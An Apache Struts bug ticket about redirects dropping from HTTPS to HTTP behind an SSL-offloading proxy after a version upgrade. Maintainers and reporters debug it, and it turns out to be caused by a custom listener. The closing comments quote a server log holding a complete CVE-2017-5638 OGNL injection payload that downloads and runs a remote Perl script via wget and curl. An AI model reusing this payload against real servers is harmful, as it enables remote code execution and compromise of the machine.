Struts 2 - WW-4774

Upgrading Struts 2.3.1 to 2.5.10.1 - Redirect issues HTTPS to HTTP

    Details

    • Type: Bug
    • Status: Closed
    • Priority: Critical
    • Resolution: Fixed
    • Affects Version/s: 2.5.10
    • Fix Version/s: 2.5.12
    • Component/s: None
    • Labels: None

      Description

      We are upgrading Struts2 from 2.3.1 to 2.5.10.1; the redirect is turning https:// into http://. The following errors in Chrome and IE are seen while redirecting from the popup to the main window
      (redirecting popup (create user) — main window (viewdashboard)): the URL goes from https:// to http://

      We are blocked completely due to this issue and need support ASAP. We also reviewed the Apache server configuration and it looks good. Please share the fix in detail.

      Error in Chrome:
      Mixed Content: The page at 'https://XXXXX/XX/XX/viewdashboard?clear&Id=1&uar=44' was loaded over HTTPS, but requested an insecure XMLHttpRequest endpoint 'http://XXX/XX/XX/viewdashboard?uar=44&Id=1'. This request has been blocked; the content must be served over HTTPS.

      Issue in IE
      SEC7127: Redirect was blocked for CORS request.
      File: account
      SCRIPT7002: XMLHttpRequest: Network Error 0x2ef1, Could not complete the operation due to error 00002ef1.


          Activity

          sdutry Stefaan Dutry added a comment -

          Can you please provide some additional information?

          What tags are on the page that could have created the url?

          From what I can tell you are located on
          https://XXXXX/XX/XX/viewdashboard?clear&Id=1&uar=44
          And somewhere on the page there is a url being used that is:
          http://XXX/XX/XX/viewdashboard?uar=44&Id=1

          Would you have any idea where on the page that url could be located and by what tag it could be rendered?

          You say this happens while being on the "create user" popup and trying to leave it, what happens during the leaving of the popup?

          • is that a link that's being clicked?
            • How is that link built?
            • What tags are used and what attributes are set?
          • is that a form that's being submitted?
            • what tags are used and what attributes are set?
          • how is the popup rendered?
            • is it content from a remote url?
              • is that url https ?
          devulapalli upendar added a comment - - edited

          Thank You for looking into the issue.

          1. Logged in to the application built on Struts 2 version 2.5.10.1.
          2. It takes you to the dashboard page (main page).
          3. Click on the "add user" button on the main page, and a popup window prompts for the details of the new user to be created.
          4. Click on the submit button on the popup. The request is sent to the REST API (running on another instance), the user is persisted in the DB successfully, then the popup should close and redirect to the main dashboard page to show the newly created user's details. But the popup still remains showing and does not get closed, even though the new user is created successfully.
          5. Errors in the Chrome and IE developer tools (mixed content and CORS).
          6. We don't see any issues with Struts 2.3.1.

          The code snippet below will help you. The remote URL is https.

          import org.apache.struts2.convention.annotation.Action;
          import org.apache.struts2.convention.annotation.Namespace;
          import org.apache.struts2.convention.annotation.Result;
          import org.apache.struts2.convention.annotation.Results;

          @SuppressWarnings("serial")
          @Namespace("/account")
          @Results({
              @Result(name = Views.DASHBOARD, location = "/account/dashboard.tiles", type = TILES),
              @Result(name = Views.DASHBOARD_REDIRECT, location = "/account/viewdashboard", type = REDIRECT),
              @Result(name = Views.UPDATE_REDIRECT, location = "/account/updateForm", type = REDIRECT),
              @Result(name = Views.CREATE, location = "/account/create.tiles", type = Views.Types.TILES),
              @Result(name = Views.UPDATE, location = "/account/edit.tiles", type = Views.Types.TILES),
              @Result(name = Views.CREATE_USER, location = "/user/createUser.tiles", type = Views.Types.TILES)
          })
          public class AccountXXX extends AuthXXXome {

              @Action("create")
              public String create() {
                  try {
                      // Create the user through the remote REST API, then redirect to the dashboard
                      account = restAPI.getUserCreation().create(targetAccount);
                      accountId = account.getId();
                      addActionMessage(getText("account.create.success"));

                      return Views.DASHBOARD_REDIRECT;   // REDIRECT result: the Location header is built by the container
                  } catch (final RuntimeException e) {
                      processException(e);
                      return Views.CREATE;
                  }
              }
          }
          
          sdutry Stefaan Dutry added a comment -

          Just to make sure:

          So it's this part of the config that causes the scheme to be changed?

          @Result(name = Views.DASHBOARD_REDIRECT, location = "/account/viewdashboard", type = REDIRECT)
          

          Can you also check that the URL being used to execute the AccountXXX.create action definitely is https?

          devulapalli upendar added a comment -

          The configuration is
          ELB ---->Apache – ELB – UI Server (Jetty 8.1.4)
          (https) -->http ---http>http — and the SSL is terminated at the ELB. The URL in the browser always shows HTTPS when the application is opened in the browser. I believe the acccountxxx.create action is HTTPS, since on the main window we have a search page that is working fine and shows HTTPS in Chrome developer tools. Can you help me with how to check this - what code should I add to confirm it?
          Also, what class/library code will change HTTPS to HTTP for the redirect URL? I see many users raised questions on Struts 2 HTTPS-HTTP but I didn't find any concrete answer for this. Could you check and let us know whether there are any specific migration steps to be followed for the upgrade from 2.3.1 to 2.5.10.1, since the same configuration in Struts and the Apache server works fine with 2.3.1 and not with the latest version? Is there any specific code involved for this change from HTTPS to HTTP?

          Is the 2.5.10.1 version stable?

          sdutry Stefaan Dutry added a comment -

          Is the 2.5.10.1 version stable?

          Yes, this is the latest stable release.

          I'll try and reproduce the problem by setting up a small application with a form submit that has a REDIRECT result and see if it also switches between http and https.

          What's used internally is actually just HttpServletResponse.encodeRedirectURL:

          ServletRedirectResult.java
                  finalLocation = response.encodeRedirectURL(tmpLocation.toString());
          
                  LOG.debug("Redirecting to finalLocation: {}", finalLocation);
          
                  sendRedirect(response, finalLocation);
          
          lukaszlenart Lukasz Lenart added a comment - - edited

          Do you use any other plugin that handles http to https redirection? Struts is protocol agnostic in that area, maybe you have a custom JSP tag? Can you list all the jars?

          sdutry Stefaan Dutry added a comment -

          Lukasz Lenart
          I am able to reproduce this issue with a minimal setup.
          It seems that a result of type "redirect" actually does result in an http request.

          github repo: https://github.com/sdutry/WW-4774
          running application from github repo: https://polar-mesa-87056.herokuapp.com/

          Clicking the link on the page with action A results in a redirect result and causes the protocol to become http
          sdutry Stefaan Dutry added a comment -

          according to the logs:

          11:50:36.502 [qtp2129789493-12] DEBUG org.apache.struts2.result.ServletRedirectResult - Redirecting to finalLocation: /b
          
          • This means that the method sendRedirect still gets a relative URL
          devulapalli upendar added a comment - - edited

          Thanks for reproducing the issue; I did verify the Struts logs (2.3.32, not yet checked with version 2.5.20.1) and it is a relative path. Could you please share the solution with a code fix, as we are completely blocked and have been investigating the issue for the past 3 days, and the investigation is still going.

          Logs with Struts 2.3.32 (I didn't check 2.5.10.1 yet):
          20 Mar 2017 23:23:24,531 [qtp2122964643-20 - /core/account/create] DEBUG org.apache.struts2.dispatcher.ServletRedirectResult (debug:76) - [/account/viewdashboard] isn't absolute URI, assuming it's a path
          20 Mar 2017 23:23:24,531 [qtp2122964643-20 - /core/account/create] DEBUG org.apache.struts2.dispatcher.ServletRedirectResult (debug:76) - Redirecting to finalLocation /core/account/viewdashboard?uar=XXX&accountId=XXXX

          Also, I just wanted to share an observation: we initially tried upgrading the Struts version from 2.3.1 to 2.3.32 to resolve the CVE-2017-5638 issue.
          With Struts 2.3.32 we found 2 issues: 1. the redirect issue and 2. the CVE-2017-5638 vulnerability were not resolved. Then we upgraded to 2.5.10.1; this version still has the redirect issue open, but is not vulnerable. Not sure why 2.3.32 did not resolve the vulnerability issue.

          Now we are on 2.5.10.1; please help us to fix the redirect issue with 2.5.10.1.

          https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5638

          devulapalli upendar added a comment -

          Here are jars we are using

          spring-aop-4.2.4.RELEASE
          spring-aspects-4.2.4.RELEASE
          spring-beans-4.2.4.RELEASE
          spring-context-4.2.4.RELEASE
          spring-context-support-4.2.4.RELEASE
          spring-core-4.2.4.RELEASE
          spring-expression-4.2.2.RELEASE
          spring-security-core-4.0.3.RELEASE
          spring-security-web-4.0.3.RELEASE
          spring-tx-4.2.4.RELEASE
          spring-web-4.2.4.RELEASE
          struts2-convention-plugin-2.3.32
          struts2-core-2.3.32
          struts2-json-plugin-2.3.32
          struts2-spring-plugin-2.3.32
          struts2-core-2.3.32
          struts2-tiles-plugin-2.3.32
          tiles-api-2.2.2
          tiles-core-2.2.2
          tiles-el-2.2.2
          tiles-freemarker-2.2.2
          tiles-jsp-2.2.2
          tiles-ognl-2.2.2
          tiles-servlet-2.2.2
          tiles-template-2.2.2
          wikitext.mediawiki-0.9.4.I20090220-1600-e3x
          wikitext-0.9.4.I20090220-1600-e3x
          wikitext-1.0.1
          xbean-spring-3.7
          xwork-core-2.3.32

          sdutry Stefaan Dutry added a comment -

          Lukasz Lenart

          The only way I can see to fix this is the following:

          • make a complete URL, including the scheme, to use for the request.sendRedirect()
          • if the X-Forwarded-Proto header is present, use that as scheme
          • if the X-Forwarded-Proto header is not present, use request.getScheme()
          devulapalli upendar added a comment -

          When I debugged, the request.getScheme() method is returning http; we thought of overriding it with https but we didn't find a simple way yet. Will check whether X-Forwarded-Proto is present or not. We thought of setting this header on the Apache server side, but I heard setting this header will cause security related issues, not sure?

          Is there a bug in version 2.5.10.1? Why is this causing HTTPS to HTTP? It's working fine with the 2.3.1 version. What could be the root cause with the latest versions (2.3.32 or 2.5.10.1)?

          Are there any plugins available to resolve this issue?

          devulapalli upendar added a comment - - edited

          I added it in the Apache server but it didn't work; here is the snippet

          <VirtualHost *:XXX>
          LogLevel warn
          RequestHeader set X-Forwarded-Proto "https"
          ServerName XXXXX
          RewriteEngine on
          RewriteLog /var/log/httpd/rewrite.log
          RewriteLogLevel 3

          RewriteCond %{HTTPS} !=on
          RewriteCond %{HTTP:X-Forwarded-Proto} !https [NC]
          RewriteRule ^ https://%{HTTP_HOST}%{REQUEST_URI} [L,R=301,NE]
          #RewriteCond %{HTTP_HOST} !^XXXXXX$ [NC]
          #RewriteRule ^(.*)$ http://XXXXXXX$1 [R,L,NE]

          RewriteRule ^/XXX/XXForm(.*)$ /XX/XX/xxxnForm$1 [R,L,NE]

          RewriteCond %{REQUEST_METHOD} !^GET$ [NC]
          RewriteCond %{SCRIPT_FILENAME} ^/asset [NC]
          RewriteRule .* - [F,NE]

          RewriteCond %{QUERY_STRING} ^(.)internal(=[^&]+)?&?(.)?$
          RewriteRule ^(.*)$ $1?%1%3 [L,R=301,NE]

          sdutry Stefaan Dutry added a comment -

          upendar
          I don't think you'll be able to fix it with any proxy in between your server.
          The problem being that the redirect happens on your webserver, which just sends a 302 status with a Location header pointing to the desired URL.
          This response is interpreted by the browser, which just reads the Location header to determine what URL to call.

          The comment I made was for an adjustment inside the ServletRedirectResult.java code (part of the Struts framework).

          devulapalli upendar added a comment -

          Stefaan Dutry, sorry, I am unable to follow. Could you help me with what we need to do to resolve the issue? Do you confirm this is not an issue with the Struts version? If so, then how is it working with the lower version 2.3.1? Please help with a fix to resolve the issue.

          lukaszlenart Lukasz Lenart added a comment -

          upendar what do you mean that the Struts 2.3.32 didn't resolve CVE-2017-5638? Please send any details to security@struts.apache.org

          sdutry Stefaan Dutry added a comment -

          upendar
          What I've found so far:

          Is this issue caused by Struts?
          No, it's not exactly caused by Struts. The problem is caused by the fact that the sendRedirect method from HttpServletResponse doesn't take https offloading into account.
          Can this issue be prevented by a change inside Struts?
          It probably can be fixed by a change in Struts.
          Can this issue be fixed on your side?
          Unfortunately I don't know the capabilities of ELB. Chances are that it's powerful enough to do this. It would require changing the Location response header when there is one. This is not the correct location for this fix.
          How is this working with version 2.3.1?
          No idea, I don't see any notable change concerning how the redirect is performed.

          Currently I'm still looking into finding a fix for this.

          sdutry Stefaan Dutry added a comment -

          Lukasz Lenart
          I've tried making a complete URL using the buildUrl method of the urlHelper.

          Somehow when I do that, the complete URL no longer contains the port number when running locally (localhost:8080 (maven-jetty-plugin)), causing them to no longer work.

          Am I missing something here?

          devulapalli upendar added a comment - - edited

          We use the jars below; there are still a few more jars being used in the application, I didn't list all of them.

          If you could let us know what change needs to be done in Struts, that would be really good. As you said, you were able to replicate the issue, right? There is no change in the servlet API, and sendRedirect() is being called in the Struts org.apache.struts2.dispatcher.ServletRedirectResult class with finalLocation being a relative path, as you stated; eventually the servlet response will construct the entire URL.

          jetty-servlet-8.1.4.v20120524.jar
          javax.servlet-3.0.0.v201112011016.jar
          javax.servlet.jsp.jstl-1.2.0.v201105211821.jar
          javax.servlet.jsp-2.2.0.v201112011158.jar
          tiles-servlet-3.0.7.jar
          tiles-request-servlet-1.0.6.jar

          lukaszlenart Lukasz Lenart added a comment -

          Stefaan Dutry can you try to use redirectAction instead of redirect in your example?

          upendar please share why 2.3.32 didn't resolve the vulnerability for you, it's important.

          sdutry Stefaan Dutry added a comment -

          Lukasz Lenart

          I tried with redirectAction.
          It also results in switching to http.

          But from what I see, redirectAction just extends from redirect, so it would be weird if they behaved differently.

          see: https://polar-mesa-87056.herokuapp.com/

          lukaszlenart Lukasz Lenart added a comment -

          Yeah, I know, but I wanted to understand what's going on. I have a project that uses https and actionRedirect and it works without problems. So this is mainly an issue with using ELB/Proxy/etc? Not really related to Struts itself? Because as far as I understand, it's the servlet's responsibility to translate a relative path into the full URL.

          the servlet container must convert the relative URL to an absolute URL before sending the response to the client.
          http://docs.oracle.com/javaee/6/api/javax/servlet/http/HttpServletResponse.html#sendRedirect(java.lang.String)

          sdutry Stefaan Dutry added a comment -

          Lukasz Lenart
          I have to agree and disagree at the same time.

          Not really related to Struts itself?
          Indeed, not really a Struts issue.
          So this is mainly an issue with using ELB/Proxy/etc
          Not really, they are setting the correct X-Forwarded-Proto, which should indicate what the protocol was.
          the servlet container must convert the relative URL to an absolute URL before sending the response to the client.
          It's basically the implementation of the HttpServletResponse that's not handling it correctly.

          I was only thinking about a workaround where we provide the full URL to the sendRedirect method.

          lukaszlenart Lukasz Lenart added a comment -

          ... but if this worked correctly with the previous version of Struts, I assume that they have had a proper configuration that matches the old version, and probably that's the case - it doesn't fit the new version, maybe the WAR name changed, or they have overlooked a container configuration (i.e. context.xml inside an old project, etc.).

          Charu_R Charu Ramchandani added a comment -

          Hi,
          I am part of Upendar's team, working on this issue.

          Just have this doubt, if Spring Security could be playing around here. As with Struts 2.3.1 version, we were using Spring 3.0.5.RELEASE version.

          sdutry Stefaan Dutry added a comment -

          Lukasz Lenart
          I had had a meeting with our system administrator at work to discuss this topic.

          In case of a tomcat server the solution would have been to add a separate connector (on a different port) and set the scheme to https. Then making sure that this connector gets used when a request originating from https is called.
          This way if a call to getScheme() happens, it will result in https.

          Example from the Tomcat site:
          <!-- Define a SSL Coyote HTTP/1.1 Connector on port 8443 -->
          <Connector
                     protocol="org.apache.coyote.http11.Http11AprProtocol"
                     port="8443" maxThreads="200"
                     scheme="https" secure="true" SSLEnabled="true"
                     SSLCertificateFile="/usr/local/ssl/server.crt"
                     SSLCertificateKeyFile="/usr/local/ssl/server.pem"
                     SSLVerifyClient="optional" SSLProtocol="TLSv1+TLSv1.1+TLSv1.2"/>
          

          Although this solution is possible when you have full control over the application server (and its configuration) it's deployed on, I can imagine plenty of cases where that's not the case.

          Should I try to create 2 extra separate resultTypes for people for whom the previous is not an option?
          for example:

          • SSLAwareServletRedirectResult
          • SSLAwareServletActionRedirectResult
          lukaszlenart Lukasz Lenart added a comment -

          You can try; if this isn't overcomplicated, we can include those results in struts-extras.

          devulapalli upendar added a comment -

          Any update on this, please?

          sdutry Stefaan Dutry added a comment -

          upendar
          Maybe you can check this post out for a fix.

          http://www.exampit.com/blog/javahunter/5-8-2016-Why-does-https-become-http-on-a-sendredirect

          This involves the following steps:

          • Creating an HttpServletResponseWrapper implementation
            • override sendRedirect
            • change the URL in the way needed on the condition for your situation, be it by interpreting the Forwarded header (RFC7239) or the X-Forwarded-Proto header or another custom header your https offloader specifies.
          • Creating a filter that uses the newly defined HttpServletResponseWrapper
          • use the filter in your web-application
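The wrapper-and-filter approach from those steps, written out as an added example (this is not code from the linked blog post, from Struts or from this ticket): the filter only trusts the proxy-supplied scheme when the request really came from the TLS offloader, reads RFC 7239 `Forwarded` before `X-Forwarded-Proto`, and rebuilds relative redirect targets as absolute https URLs so the container cannot downgrade them. The class names, the trusted-proxy addresses and the assumption that the proxy terminates TLS on port 443 are mine.

```java
import java.io.IOException;
import java.net.URI;
import java.util.Set;

import javax.servlet.Filter;
import javax.servlet.FilterChain;
import javax.servlet.FilterConfig;
import javax.servlet.ServletException;
import javax.servlet.ServletRequest;
import javax.servlet.ServletResponse;
import javax.servlet.http.HttpServletRequest;
import javax.servlet.http.HttpServletResponse;
import javax.servlet.http.HttpServletResponseWrapper;

/**
 * Servlet filter that wraps the response so that sendRedirect() sends an
 * absolute https:// Location whenever the TLS-terminating proxy says the
 * client connection was HTTPS. Example code for this discussion; the class
 * names, the trusted-proxy addresses and the default-port assumption are mine.
 */
public class HttpsOffloadRedirectFilter implements Filter {

    // Assumption: only these proxies may assert the client's scheme. Forwarded
    // headers from any other peer are ignored, since a client can set them too.
    private static final Set<String> TRUSTED_PROXIES = Set.of("10.0.0.10", "10.0.0.11");

    @Override
    public void init(FilterConfig filterConfig) { }

    @Override
    public void destroy() { }

    @Override
    public void doFilter(ServletRequest req, ServletResponse res, FilterChain chain)
            throws IOException, ServletException {
        HttpServletRequest request = (HttpServletRequest) req;
        HttpServletResponse response = (HttpServletResponse) res;
        if (TRUSTED_PROXIES.contains(request.getRemoteAddr())
                && "https".equals(forwardedScheme(request))) {
            response = new HttpsRedirectResponse(request, response);
        }
        chain.doFilter(req, response);
    }

    /** Scheme asserted by the proxy: RFC 7239 Forwarded first, then X-Forwarded-Proto. */
    static String forwardedScheme(HttpServletRequest request) {
        String forwarded = request.getHeader("Forwarded");
        if (forwarded != null) {
            // e.g. Forwarded: for=192.0.2.60;proto=https;by=203.0.113.43
            // Only the first list element (the proxy nearest the client) is read.
            for (String pair : forwarded.split(",", 2)[0].split(";")) {
                String[] kv = pair.trim().split("=", 2);
                if (kv.length == 2 && kv[0].equalsIgnoreCase("proto")) {
                    return kv[1].replace("\"", "").trim().toLowerCase();
                }
            }
        }
        String xfp = request.getHeader("X-Forwarded-Proto");
        if (xfp != null) {
            // Chained proxies may append values; the first is the client-facing one.
            return xfp.split(",")[0].trim().toLowerCase();
        }
        return request.getScheme();
    }

    /** Turns every relative redirect into an absolute https URL before the container sees it. */
    static final class HttpsRedirectResponse extends HttpServletResponseWrapper {
        private final HttpServletRequest request;

        HttpsRedirectResponse(HttpServletRequest request, HttpServletResponse response) {
            super(response);
            this.request = request;
        }

        @Override
        public void sendRedirect(String location) throws IOException {
            super.sendRedirect(toHttps(request, location));
        }
    }

    /**
     * Resolves the location the way the container would (against the current
     * request URI, or from the root for a leading '/'), but with https and the
     * externally visible host. Absolute URLs are passed through unchanged.
     */
    static String toHttps(HttpServletRequest request, String location) {
        URI target = URI.create(location);
        if (target.isAbsolute()) {
            return location;
        }
        // Assumption: the proxy terminates TLS on 443, so the container's own
        // port (from the Host header) must not appear in the Location.
        URI base = URI.create("https://" + request.getServerName() + request.getRequestURI());
        return base.resolve(target).toString();
    }
}
```

Map the filter in web.xml ahead of StrutsPrepareAndExecuteFilter so that the wrapped response is the one Struts' redirect results call sendRedirect on.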
          Charu_R Charu Ramchandani added a comment -

          Another point to add here is that we have a custom Interceptor which inherits from the MessageStoreInterceptor class, wherein we are registering a custom PreResultListener before invoking super.intercept(), i.e.,

          MyCustomInterceptor.java
          // Some comments here
          @Override
          public String intercept(ActionInvocation invocation) throws Exception {
              // Register our listener before delegating to MessageStoreInterceptor
              invocation.addPreResultListener(new MyCustomPreResultListener());
              return super.intercept(invocation);
          }
          

          and here is the listener

          MyCustomPreResultListener.java
          @Override
          public void beforeResult(ActionInvocation invocation, String resultCode) {
              // If in a page fragment
              if (!Strings.isNullOrEmpty(resultCode) && invocation instanceof DefaultActionInvocation
                      && invocation.getAction() instanceof MyBaseAction) {
                  try {
                      final DefaultActionInvocation dai = (DefaultActionInvocation) invocation;
                      final MyBaseAction action = (MyBaseAction) invocation.getAction();
                      // Instantiate the result that Struts is about to execute
                      final Result res = dai.createResult();

                      if (action.inFragment() && res instanceof ServletRedirectResult) {
                          final ServletRedirectResult servletRedirectResult = (ServletRedirectResult) res;
                          redirectToPage(invocation, servletRedirectResult.getLocation(),
                                  getAnchorFromRedirect(servletRedirectResult), action, servletRedirectResult);
                      }
                  } catch (Exception e) {
                      e.printStackTrace();
                  }
              }
          }

          // getAnchorFromRedirect uses reflection to read the value of anchor from the
          // ServletRedirectResult object, which is coming as null

          public static void redirectToPage(ActionInvocation invocation, String url, String anchor,
                  MyBaseAction action, ServletRedirectResult res) throws Exception {
              final HttpServletRequest req = ServletActionContext.getRequest();
              res.setStatusCode(204);

              MyParametersUtil.exportParameters(req, action, BaseActionHome.class);
              res.setAnchor(anchor);

              res.setLocation(MyParametersUtil.rewriteUrl(req, url));

              // Executes the redirect result from inside the PreResultListener,
              // which commits the response before the normal result runs
              res.execute(invocation);
              invocation.setResultCode(null);
          }
          

          Somehow, if I call redirect on the servletRedirectResult object, then we are able to redirect to the page, but then action messages don't populate. We get IllegalStateException: Committed.

          Can you suggest something here, please? We need to close this soon.

          lukaszlenart Lukasz Lenart added a comment - - edited

          Charu Ramchandani your listener executes the result, which means the response was already sent back to the client, so the MessageStorePreResultListener won't work. And what version of Struts do you use? The latest MessageStorePreResultListener (from Struts 2.5.10.1) can handle an already committed response (it won't store messages either, but there will be no exception).

          Charu_R Charu Ramchandani added a comment -

          We had this code working for Struts 2.3.1, which didn't have any MessageStorePreResultListener, and MessageStoreInterceptor was handling the action messages. Now, with 2.5.10.1 and MessageStorePreResultListener in place, this code is messing up.
          Any thoughts on how we handle this?

          lukaszlenart Lukasz Lenart added a comment -

          I have no idea what you want to achieve with your PreResultListener, but it isn't a place to execute results. If you need a dedicated ServletRedirectResult you should implement one instead of doing such nasty hacks.

          Charu_R Charu Ramchandani added a comment -

          In the custom PreResultListener, we are just redirecting to a page in case the action was triggered on the click of the save button (of a form displayed in a pop-up window), whereas the message storing part was handled in the after() function of MessageStoreInterceptor (as in Struts 2.3.1).
          Now with the MessageStorePreResultListener in the picture, how do we handle the redirect part if we leave the message storing to be handled by the new listener?

          lukaszlenart Lukasz Lenart added a comment -

          As I said, doing such things in a PreResultListener is a bad idea. If you need to change a flow (which action and result will be called) it's better to use an interceptor.

          devulapalli upendar added a comment -

          If I remove all my custom listeners and filters, will servlet/Struts version 2.5.10.1 handle the redirect (302)? Do I really need to implement a filter/listener to handle the redirect? Please let me know.

          lukaszlenart Lukasz Lenart added a comment -

          It handles it right now; the problem is with your Servlet container configuration and probably with all those hacks you did.

          devulapalli upendar added a comment -

          Where can I see the default struts.xml file mapped for the 2.5.10.1 version? Could you help me?

          sdutry Stefaan Dutry added a comment -

          Lukasz Lenart
          So far I've got a working POC with what I intend to do:
          https://obscure-reaches-63654.herokuapp.com/

          I just need to move it into its own class and package with a proper name.

          Do you want me to create a separate module inside struts2-extras for them?
          If so, any suggestions for a name for the module?

          sdutry Stefaan Dutry added a comment -

          upendar
          https://github.com/apache/struts/blob/STRUTS_2_5_10_1/core/src/main/resources/struts-default.xml

          lukaszlenart Lukasz Lenart added a comment -

          upendar is that what you want? https://github.com/apache/struts/blob/master/core/src/main/resources/struts-default.xml

          Stefaan Dutry yes, please add a new plugin project here https://github.com/apache/struts-extras - no idea how to name it, maybe Struts 2 Custom results plugin ?

          devulapalli upendar added a comment -

          Stefaan Dutry, Lukasz Lenart, are you adding a new plugin with a fix to resolve this issue? Once it's done, can we use that plugin (to use that plugin, we will review the custom filters and listeners we have)?

          githubbot ASF GitHub Bot added a comment -

          GitHub user sdutry opened a pull request:

          https://github.com/apache/struts-extras/pull/3

          added module for extra result types

          This is still work in progress.

          The reason i'm already having it as pull request is because any input is welcome.

          related to WW-4774

          So far
          • `HttpsOffloadAwareServletRedirectResult`
          • checks `X-Forwarded-Proto` header

          TODO
          • support official `Forwarded` header
          • `HttpsOffloadAwareServletActionRedirectResult`
          • add `struts-plugin.xml` file with result type definitions
          • add `README.md`

          You can merge this pull request into a Git repository by running:

          $ git pull https://github.com/sdutry/struts-extras httpsfix

          Alternatively you can review and apply these changes as the patch at:

          https://github.com/apache/struts-extras/pull/3.patch

          To close this pull request, make a commit to your master/trunk branch
          with (at least) the following in the commit message:

          This closes #3


          commit 1a64217f87566831864371622673951d29dca79a
          Author: Stefaan Dutry <stefaan.dutry@gmail.com>
          Date: 2017-03-27T21:20:48Z

          added HttpsOffloadAwareServletRedirectResult

          commit 7879bafe58fd7d82d8e31f34dd88736e337f0a12
          Author: Stefaan Dutry <stefaan.dutry@gmail.com>
          Date: 2017-03-27T21:25:40Z

          used spaces for indentation


          devulapalli upendar added a comment -

          Charu has resolved the issue by MyCustomPreResultListener extending MessageStorePreResultListener class and some other changes in that class.

          Thanks much Stefaan Dutry and Lukasz Lenart for your support.

          lukaszlenart Lukasz Lenart added a comment - - edited

          upendar what does it mean? that your problems with redirecting to HTTPS are gone? Can we close this issue?

          devulapalli upendar added a comment -

          Lukasz Lenart Yes, the issue is resolved, we are good now. Thanks for your support.

          lukaszlenart Lukasz Lenart added a comment -

          upendar so all those problems were related to a custom PreResultListener?

          devulapalli upendar added a comment -

          Yes. The original implementation with the 2.3.1 version in my code base is MyCustomPreResultListener implements PreResultListener. We made the change MyCustomPreResultListener extends MessageStorePreResultListener class. Also, we are overriding the redirect() method in which ServletRedirectResult res = new ServletRedirectResult(); is re-instantiated; instead we are passing the same one we got originally. Let me know if you want the full changes to understand better.

          lukaszlenart Lukasz Lenart added a comment -

          That's cool, just wanted to be double-sure and let others find a similar issue and solution, thanks

          devulapalli upendar added a comment -

          Lukasz Lenart could you please confirm for me whether Struts version 2.3.1 is vulnerable to CVE-2017-5638 or not?
          Is version 2.3.32 the right fix, or is Struts 2.5.10.1 the right version to resolve the CVE-2017-5638 issue? Please confirm.

          lukaszlenart Lukasz Lenart added a comment -

          As far I know Struts 2.3.1 isn't affected by this vulnerability.

          devulapalli upendar added a comment -

          Do you have any idea what fix was actually done to prevent the vulnerability?

          lukaszlenart Lukasz Lenart added a comment -

          https://github.com/apache/struts/commit/352306493971e7d5a756d61780d57a76eb1f519a

          devulapalli upendar added a comment - - edited

          Thank you, but we got attacks with Struts version 2.3.1; what could be the reason? I see all Struts versions 2.3.1 and commons-fileupload-1.2.2 and ognl-3.0.3.jar; could you help me to trace out what could be the reason for 2.3.1?

          Here is the exception stack trace:

          WARN org.apache.struts2.dispatcher.multipart.MultiPartRequest (warn:60) - Unable to parse request
          org.apache.commons.fileupload.FileUploadBase$InvalidContentTypeException: the request doesn't contain a multipart/form-data or multipart/mixed stream, content type header is %{(#_='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm)(#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='wget -qO - http://XXXXX/.jb | perl ; cd /tmp ; curl -O http://xxxxxx/.jb ; fetch http:/xxxxx/.jb ; perl .jb ;rm -rf .jb*').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?

          {'cmd.exe','/c',#cmd}

          :

          {'/bin/bash','-c',#cmd}

          )).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}
          at org.apache.commons.fileupload.FileUploadBase$FileItemIteratorImpl.<init>(FileUploadBase.java:908)
          at org.apache.commons.fileupload.FileUploadBase.getItemIterator(FileUploadBase.java:331)
          at org.apache.commons.fileupload.FileUploadBase.parseRequest(FileUploadBase.java:351)
          at org.apache.struts2.dispatcher.multipart.JakartaMultiPartRequest.parseRequest(JakartaMultiPartRequest.java:151)
          at org.apache.struts2.dispatcher.multipart.JakartaMultiPartRequest.processUpload(JakartaMultiPartRequest.java:90)
          at org.apache.struts2.dispatcher.multipart.JakartaMultiPartRequest.parse(JakartaMultiPartRequest.java:80)
          at org.apache.struts2.dispatcher.multipart.MultiPartRequestWrapper.<init>(MultiPartRequestWrapper.java:75)
          at org.apache.struts2.dispatcher.Dispatcher.wrapRequest(Dispatcher.java:740)
          at org.apache.struts2.dispatcher.ng.PrepareOperations.wrapRequest(PrepareOperations.java:131)
          at org.apache.struts2.dispatcher.ng.filter.StrutsPrepareAndExecuteFilter.doFilter(StrutsPrepareAndExecuteFilter.java:83)
          at org.eclipse.jetty.servlet.ServletHandler$CachedChain.doFilter(ServletHandler.java:1338)

          devulapalli upendar added a comment -

          Lukasz Lenart, could you please help me with the above query: how to trace this, and what happened with the 3.2.1 version?

          devulapalli upendar added a comment -

          I see some forums talking about the OGNL expression being evaluated, which caused the vulnerability; I don't see the buildErrorMessage() method in version 2.3.1, and I also don't see the LocalizedMessage class in 2.3.1, so how is 2.3.1 being hacked? I'm thinking there might be common code which exists even in 2.3.1 that is actually vulnerable. Please point me to the actual code in 2.5.10.1 vs. the vulnerable code so I can understand better.

          devulapalli upendar added a comment -

          Is commons-fileupload not contributing to this vulnerability?

          devulapalli upendar added a comment -

          The ognl version too?

          lukaszlenart Lukasz Lenart added a comment -

          This is only a WARN entry in the logs, the expected behaviour when the parser couldn't parse the incoming request. Did you observe any other hacker activity? Did they install some backdoor/spam/etc.?

          You can test your application using one of the available PoCs, e.g. https://github.com/s1kr10s/Struts2Shell

          githubbot ASF GitHub Bot added a comment -

          Github user asfgit closed the pull request at:

          https://github.com/apache/struts-extras/pull/3

          devulapalli upendar added a comment -

          Lukasz Lenart, Struts version 2.3.1 is vulnerable and has been exploited. The above error shows a WARN, but that is actually what is causing the vulnerability, as we ran many exploit scripts after the attack and it was reported as vulnerable.

          We need to understand what actually made version 2.3.1 vulnerable; the error I stated above is the same as the error reported in CVE-2017-5638. Please let me know.

